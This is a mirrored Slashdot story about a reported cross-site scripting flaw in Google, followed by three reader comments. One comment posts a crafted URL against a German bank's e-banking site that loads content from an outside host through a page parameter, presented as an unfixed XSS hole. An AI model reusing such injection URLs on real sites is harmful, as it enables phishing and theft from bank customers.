Slashdot Mirror

← Back to Stories (view on slashdot.org)

Cross Site Scripting Discovered in Google

Posted by CmdrTaco on from the hate-when-that-happens dept.

Security Test writes "Yair Amit posted a message early this morning to The Web Security Mailing List outlining a Cross Site Scripting flaw in Google that allows an attacker to carry out Phishing Attacks."

3 of 158 comments (clear)

  1. Others.. by slashkitty · · Score: 5, Informative

    They've had others in the past, but were quick to fix them. They have even sent t-shirts as thanks for the help. Other sites are not so friendly or fast. This site shows active security holes in various sites that have gone unresolved. (CSS, insecure logins, etc)

    --
    -- these are only opinions and they might not be mine.
  2. XSS in my banks website by thr0n · · Score: 5, Informative
    I told them about the XSS (CSS) security holes 2 months ago -
    response was something like: "We will work on it; or we wont - but we wont tell you ;)".
    Which sucks...

    Here we go:

    Original:
    https://www.vr-ebanking.de/index.php?RZBK=0280
    MY Version (XSS):
    https://www.vr-ebanking.de/help;jsessionid=XA?Acti on=SelectMenu&SMID=EigenesOrderbuch&MenuName=&Init Href=http://www.consti.de/secure
    /Fälschung --> Imitation /

    ... Hope they change their mind, sometime. :)

    Consti / thr0n

  3. Re:Javascript is a security problem? by tuffy · · Score: 5, Informative

    Rather than turn off JavaScript entirely, I use the NoScript extension to turn it off everywhere but on the sites I allow. The only adjustment needed was to turn off the "NoScript has blocked JavaScript" message in the extension options since it occured so frequently.

    --

    Ita erat quando hic adveni.